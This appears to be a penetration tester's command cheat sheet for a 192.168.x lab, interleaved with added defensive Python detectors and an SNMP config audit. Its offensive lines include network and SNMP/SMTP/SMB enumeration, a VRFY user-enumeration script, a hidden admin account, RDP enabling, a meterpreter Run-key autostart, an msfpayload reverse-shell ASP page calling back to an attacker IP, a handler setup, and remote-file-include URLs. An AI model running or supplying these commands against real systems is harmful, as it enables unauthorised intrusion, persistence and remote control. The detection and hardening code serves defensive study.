commands I use a lot
create list of IPs
for ip in $(seq 200 255);do echo 192.168.15.$ip;done >ip.txt
===============================
nmap scan
===============================
cmd
nmap -T4 -F 192.168.15.200-255
===============================
dns enumeration
===============================
for ip in $(seq 200 255); do
host -t ns 192.168.15.$ip |grep "domain name pointer" |cut -d " " -f5 >> names.txt
done
===============================
send mail
===============================
sendEmail -t bob@thinc.local -f bob@thinc.local -s 192.168.15.227 -u report -a /root/Documents/report.pdf
./dnsenum.pl thinc.local >>/root/Desktop/pw3tools/updatedtest/dnsenum.txt
===============================
snmp enumeration
===============================
for ip in $(seq 200 255); do
echo 192.168.15.$ip>> snmpnames.txt;snmpwalk -c public -v1 192.168.15.$ip 1.3 |grep 77.1.2.25 |cut -d " " -f4 >> snmpnames.txt
done
for ip in $(seq 200 255); do
echo 192.168.15.$ip>> snmpservices.txt;snmpwalk -c public -v1 192.168.15.$ip 1 |grep hrSWRunName |cut -d " " -f4 >> snmpservices.txt
done
/pentest/enumeration/snmp/onesixtyone/onesixtyone -c dic.txt -i ip.txt -o snmp.txt
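The snmpwalk and onesixtyone lines above only work because the target answers SNMPv1 with the community "public". An added example (not from this page's author) of the check a defender would run on the other side: a small audit of net-snmp snmpd.conf directives that flags v1/v2c communities, default community strings, write access and unrestricted sources, and v3 users that are not at the priv level. The two config fragments are constructed; the "auth" default level for rouser is assumed from net-snmp's documented behaviour.

```python
import re

# Community strings every scanner tries first (the snmpwalk above uses "public").
DEFAULT_COMMUNITIES = {"public", "private"}

# Constructed snmpd.conf fragments (net-snmp directive syntax), not from any real host.
WEAK_CONF = """\
# v1/v2c, default community, readable from anywhere
rocommunity public
rwcommunity private 192.168.15.0/24
"""

HARDENED_CONF = """\
# SNMPv3 only: authenticated + encrypted, read-only, restricted to the system subtree
createUser monitor SHA "LongAuthPassphrase!" AES "LongPrivPassphrase!"
rouser monitor priv -V systemonly
view systemonly included .1.3.6.1.2.1.1
"""


def audit_snmpd_conf(text):
    """Return a list of findings, each {line, severity, issue}, for an snmpd.conf."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        tokens = line.split()
        directive, args = tokens[0].lower(), tokens[1:]

        if directive in ("rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"):
            # rocommunity COMMUNITY [SOURCE [OID | -V VIEW]]
            community = args[0] if args else ""
            if community in DEFAULT_COMMUNITIES:
                severity, issue = "critical", f"default community string '{community}'"
            else:
                severity, issue = "high", "SNMPv1/v2c community (plaintext, password-equivalent)"
            if directive.startswith("rw"):
                issue += "; write access"
            if len(args) < 2 or args[1].lower() == "default":
                issue += "; no source restriction"
            findings.append({"line": lineno, "severity": severity, "issue": issue})

        elif directive == "com2sec":
            # com2sec NAME SOURCE COMMUNITY (the older, explicit v1/v2c mapping)
            community = args[2] if len(args) >= 3 else ""
            severity = "critical" if community in DEFAULT_COMMUNITIES else "high"
            findings.append({"line": lineno, "severity": severity,
                             "issue": f"v1/v2c community mapping for '{community}'"})

        elif directive in ("rouser", "rwuser"):
            # rouser USER [noauth|auth|priv] [-V VIEW]; net-snmp's default level is
            # assumed to be "auth", which authenticates but does not encrypt
            user = args[0] if args else "?"
            level = "auth"
            if len(args) >= 2 and not args[1].startswith("-"):
                level = args[1].lower()
            if level != "priv":
                findings.append({"line": lineno, "severity": "medium",
                                 "issue": f"SNMPv3 user '{user}' at level '{level}', not priv"})
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_snmpd_conf(conf))
```

Run against WEAK_CONF it reports both community lines as critical; against HARDENED_CONF it reports nothing, because a priv-level v3 user scoped to a view is what the snmpwalk -c public -v1 loop cannot talk to.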
===============================
smtp enumeration
===============================
#!/usr/bin/env python3
# usage: python3 vrfy.py 127.0.0.1 < usernames.txt
import socket
import sys

# one username per line on stdin; blank lines are skipped
users = []
for line in sys.stdin:
    line = line.strip()
    if line != '':
        users.append(line)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 25))
fp = s.makefile('rwb')          # binary file object: SMTP is byte-oriented
fp.readline()                   # ignore banner
fp.write(b'HELO test.example.com\r\n')
fp.flush()
fp.readline()                   # ignore response
for user in users:
    fp.write(b'VRFY %s\r\n' % user.encode())
    fp.flush()
    print('%s: %s' % (user, fp.readline().decode().strip()))
fp.write(b'QUIT\r\n')
fp.flush()
s.close()
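The vrfy.py script above produces a very recognisable pattern on the mail server: one client issuing a burst of VRFY commands, most of them answered 550. An added example (not part of the original post) of the detection side: a parser over constructed MTA log lines in a hypothetical "cmd=... arg=... resp=..." format (not the native format of any particular mail server) that reports clients sending more than a threshold of VRFY commands inside a sliding time window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in a hypothetical per-command MTA log format.
# 192.168.14.126 behaves like the script above; 192.168.15.50 is a single lookup.
SAMPLE_LOG = """\
2024-03-01T10:00:01 smtpd[4411]: client=192.168.14.126 cmd=HELO arg=test.example.com resp=250
2024-03-01T10:00:02 smtpd[4411]: client=192.168.14.126 cmd=VRFY arg=root resp=252
2024-03-01T10:00:02 smtpd[4411]: client=192.168.14.126 cmd=VRFY arg=bob resp=252
2024-03-01T10:00:03 smtpd[4411]: client=192.168.14.126 cmd=VRFY arg=alice resp=550
2024-03-01T10:00:03 smtpd[4411]: client=192.168.14.126 cmd=VRFY arg=admin resp=550
2024-03-01T10:00:04 smtpd[4411]: client=192.168.14.126 cmd=VRFY arg=paul resp=252
2024-03-01T10:00:04 smtpd[4411]: client=192.168.14.126 cmd=VRFY arg=www-data resp=550
2024-03-01T10:00:09 smtpd[4412]: client=192.168.15.50 cmd=VRFY arg=postmaster resp=252
2024-03-01T10:00:10 smtpd[4412]: client=192.168.15.50 cmd=QUIT arg= resp=221
2024-03-01T10:30:00 smtpd[4413]: client=192.168.14.126 cmd=VRFY arg=late resp=550
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) smtpd\[\d+\]: client=(?P<client>[\d.]+) "
    r"cmd=(?P<cmd>[A-Z]+) arg=(?P<arg>\S*) resp=(?P<resp>\d{3})$"
)


def parse_lines(text):
    """Yield one dict per well-formed line; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        events.append(ev)
    return events


def find_vrfy_probes(text, threshold=5, window=timedelta(seconds=60)):
    """Return {client: peak_count} for clients that sent at least `threshold`
    VRFY commands inside any window of length `window`."""
    per_client = defaultdict(list)
    for ev in parse_lines(text):
        if ev["cmd"] == "VRFY":
            per_client[ev["client"]].append(ev["ts"])

    hits = {}
    for client, stamps in per_client.items():
        stamps.sort()
        start, peak = 0, 0
        for end in range(len(stamps)):
            # slide the window start forward until it fits within `window`
            while stamps[end] - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            hits[client] = peak
    return hits


if __name__ == "__main__":
    print(find_vrfy_probes(SAMPLE_LOG))   # {'192.168.14.126': 6}
```

The single VRFY from 192.168.15.50 and the stray one half an hour later from 192.168.14.126 stay below the threshold; only the six-command burst is reported. The mitigation is simpler still: Postfix, for instance, has disable_vrfy_command = yes, after which the script only ever sees 502 responses.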
===============================
smb enumeration
===============================
/pentest/python/impacket-examples# ./samrdump.py 192.168.15.236
smb4k
nmap 192.168.15.236 --script smb-enum-users.nse
===============================
full scan
===============================
nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script all 192.168.15.200-255
===============================
create user from cmd line
===============================
net user paul 23u75t0zjdj /add
net localgroup administrators paul /add
===============================
Enable remote desktop from command line
===============================
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v msg /t REG_SZ /d C:\inetpub\meterpreter.exe /f
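The two sections above (net user / net localgroup, then the two reg add lines) leave a short, distinctive trail in Windows telemetry: Security 4720 (account created) followed seconds later by 4732 (member added to Administrators) for the same SID, then Sysmon event 13 (registry value set) on fDenyTSConnections and on a Run key. An added example, not from the page's author, of correlating those records; the events are constructed and flattened to the fields the rules need, and the field names follow the Security and Sysmon event schemas.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry). "Security" = Windows Security
# log, "Sysmon" = Sysmon operational log; field names follow those event schemas.
SAMPLE_EVENTS = [
    {"log": "Security", "id": 4720, "time": "2024-03-01T10:05:00",
     "SubjectUserName": "IUSR", "TargetUserName": "paul",
     "TargetSid": "S-1-5-21-1-2-3-1010"},
    {"log": "Security", "id": 4732, "time": "2024-03-01T10:05:02",
     "SubjectUserName": "IUSR", "TargetUserName": "Administrators",
     "MemberSid": "S-1-5-21-1-2-3-1010"},
    {"log": "Sysmon", "id": 13, "time": "2024-03-01T10:06:00",
     "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections",
     "Details": "DWORD (0x00000000)"},
    {"log": "Sysmon", "id": 13, "time": "2024-03-01T10:06:01",
     "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\msg",
     "Details": "C:\\inetpub\\meterpreter.exe"},
    # benign: helpdesk creates a user and nobody touches its group membership
    {"log": "Security", "id": 4720, "time": "2024-03-01T11:00:00",
     "SubjectUserName": "helpdesk", "TargetUserName": "newhire",
     "TargetSid": "S-1-5-21-1-2-3-1011"},
]


def detect_persistence(events, window=timedelta(minutes=10)):
    """Return alert strings for: new account promoted to local admin within
    `window`, RDP enabled through the registry, and Run-key autostarts."""
    alerts = []
    created = {}   # SID -> (creation time, account name)
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])

        if ev["log"] == "Security" and ev["id"] == 4720:
            created[ev["TargetSid"]] = (t, ev["TargetUserName"])

        elif (ev["log"] == "Security" and ev["id"] == 4732
              and ev["TargetUserName"].lower() == "administrators"):
            hit = created.get(ev["MemberSid"])
            if hit and t - hit[0] <= window:
                delay = int((t - hit[0]).total_seconds())
                alerts.append(f"new account '{hit[1]}' made local admin {delay}s "
                              f"after creation by {ev['SubjectUserName']}")

        elif ev["log"] == "Sysmon" and ev["id"] == 13:
            key = ev["TargetObject"]
            low = key.lower()
            if (low.endswith("\\terminal server\\fdenytsconnections")
                    and ev["Details"].endswith("(0x00000000)")):
                alerts.append(f"RDP enabled via registry by {ev['Image']}")
            elif "\\currentversion\\run\\" in low:
                name = key.rsplit("\\", 1)[-1]
                alerts.append(f"Run-key autostart '{name}' -> {ev['Details']} "
                              f"set by {ev['Image']}")
    return alerts


if __name__ == "__main__":
    for a in detect_persistence(SAMPLE_EVENTS):
        print(a)
```

The benign helpdesk creation at 11:00 produces nothing because no 4732 follows it inside the window; the three alerts come from the sequence the command lines above would generate, and the Run-key alert carries the executable path so the image can be pulled for analysis.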
===============================
create asp page with payload for remote run
===============================
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.126 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -a X86 -t asp > evilpage.asp
===============================
list allusers on linux
===============================
cat /etc/passwd | cut -d":" -f1
===============================
#!/bin/bash
for num in $(seq 0 254); do nc -v 192.168.13.$num 53; done
===============================
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
Source: http://www.rooftopsolutions.nl/blog/189
I killed the sshd daemon from one of our servers by accident today. I wanted to avoid going to the data center, so I was able to upload and run a PHP script to give me a shell.
Problem was, that it would run under the www-data user and trying to su to root gave me the following message:
su : must be run from a terminal
After some googling, I found the solution from Tero's blog. If you have python installed, just run the following from your shell:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
You now have a proper terminal, and things like 'su' will work as usual.
===============================
run shell on remote web server
===============================
http://carnal0wnage.attackresearch.com/2010/05/using-metasploit-php-remote-file.html
/slogin_lib.inc.php?slogin_path=http://192.168.14.126/shll%00
/slogin_lib.inc.php?slogin_path=http://192.168.14.126/shll/ms.txt?%00
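The two request URLs above are the remote-file-include shape: an include-path parameter set to a URL, with %00 appended so the included filename is truncated at the null byte. An added example (not from the page or the linked post) of spotting that shape in a web server's access log: constructed Apache combined-format lines, the first two mirroring the requests above, run through a parser that flags any query parameter whose decoded value is a remote URL or stream wrapper, or contains a null byte.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines in Apache "combined" layout (not a real capture).
SAMPLE_ACCESS_LOG = """\
192.168.14.126 - - [01/Mar/2024:10:10:01 +0000] "GET /slogin_lib.inc.php?slogin_path=http://192.168.14.126/shll%00 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.14.126 - - [01/Mar/2024:10:10:02 +0000] "GET /slogin_lib.inc.php?slogin_path=http://192.168.14.126/shll/ms.txt?%00 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.15.50 - - [01/Mar/2024:10:11:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.15.51 - - [01/Mar/2024:10:12:00 +0000] "GET /redirect.php?url=https%3A%2F%2Fexample.com%2Fdocs HTTP/1.1" 302 0 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" (?P<status>\d{3})'
)

# Value prefixes that turn a PHP include() of user input into a remote or
# stream-wrapper include.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "//", "php://", "data:")


def classify_value(value):
    """Return the reasons (possibly none) a decoded parameter value looks like RFI."""
    reasons = []
    if value.lower().startswith(REMOTE_PREFIXES):
        reasons.append("remote-url")
    if "\x00" in value:            # %00 after decoding: include-path truncation
        reasons.append("null-byte")
    return reasons


def find_rfi_attempts(text):
    """Parse combined-format lines and return one hit per suspicious parameter."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes, so %00 becomes a real NUL in `value`
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            reasons = classify_value(value)
            if reasons:
                hits.append({"client": m.group("client"), "path": parts.path,
                             "param": name, "value": value, "reasons": reasons,
                             "status": int(m.group("status"))})
    return hits


if __name__ == "__main__":
    for h in find_rfi_attempts(SAMPLE_ACCESS_LOG):
        print(h["client"], h["path"], h["param"], h["reasons"], h["status"])
```

The redirect.php line is reported with "remote-url" only, which is the noisy class (legitimate redirect and URL parameters look the same); a hit carrying "null-byte" as well, or a 200 status on an include-style parameter, is the one worth chasing. On the server side the request shape dies with allow_url_include=Off, and PHP 5.3.4 and later reject include paths containing a null byte.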
===============================
Shell recorder with replay (User: olorin, 2011-01-19 07:16:30)
===============================
script -t /tmp/mylog.out 2>/tmp/mylog.time; <do your work>; <CTRL-D>; scriptreplay /tmp/mylog.time /tmp/mylog.out
If you provide the option -t to the script command and redirect stderr into a file, the timing information on what is going on on the terminal is also stored.
You can replay the session via the scriptreplay command, where you can also provide a speedup factor (see the man page for details).
Great for demonstration purposes ...